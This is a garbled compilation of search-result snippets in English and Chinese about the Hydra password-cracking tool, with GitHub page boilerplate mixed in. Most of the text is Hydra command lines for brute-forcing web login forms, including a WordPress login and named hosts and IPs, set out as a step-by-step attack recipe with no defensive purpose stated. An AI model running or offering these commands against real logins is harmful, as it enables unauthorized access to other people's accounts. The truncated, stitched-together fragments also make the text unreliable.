[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp...
hydra -l {username} -P {passwordlistpath} -s {port} -f {SiteAddress} http-post-form “{Path to postback page}:{USERNAME_NAME}=^USER^&{PASSWORD_NAME}=^PASS^:{failedlogintext}“ 我的命令看起来像: hydra -l hydra-Ppassword.list -s 80 -f www.sillychicken.co.nz http-post-form “/...
4、post方式提交,破解web登录: hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<ti...
We read every piece of feedback, and take your input very seriously. Include my email address so I can be contacted Cancel Submit feedback Saved searches Use saved searches to filter your results more quickly Cancel Create saved search Sign in Sign up Reseting focus {...
HTTP-POST-FORM Attack Telnet SMTP Instructions first: Install tools according to the instructions above second: Choose one of the attacks you want to carry out third: Just follow the instructions in the tool fourth: username path : usernames.txt , password path : password.txt ...
hydra -L usernames.txt -P passwords.txt 172.31.1.30 http-post-form "/wp-login.php:log=USER&pwd=PASS&wp-submit=log+In&redirect_to=http%3A%2F172.31.1.30%2Fwp-admin%2Fwp-admin%2F&testcookie=1:incorrect" 1. 这里usernames.txt是包含用户名列表的文件,passwords.txt是包含密码列表的文件。
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.PHP 4、post方式提交,破解web登录: hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" hydra -t 3 -l admin -P pass.tx...
hydra-http-form.c hydra-http-post-attack.txt hydra-http-proxy-urlenum.c hydra-http-proxy.c hydra-http.c hydra-icq.c hydra-imap.c hydra-irc.c hydra-ldap.c hydra-logo.ico hydra-logo.rc hydra-mod.c hydra-mod.h hydra-mssql.c hydra-mysql.c hydra-ncp.c hydra-nntp.c...
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>” 说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,ht...
the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-...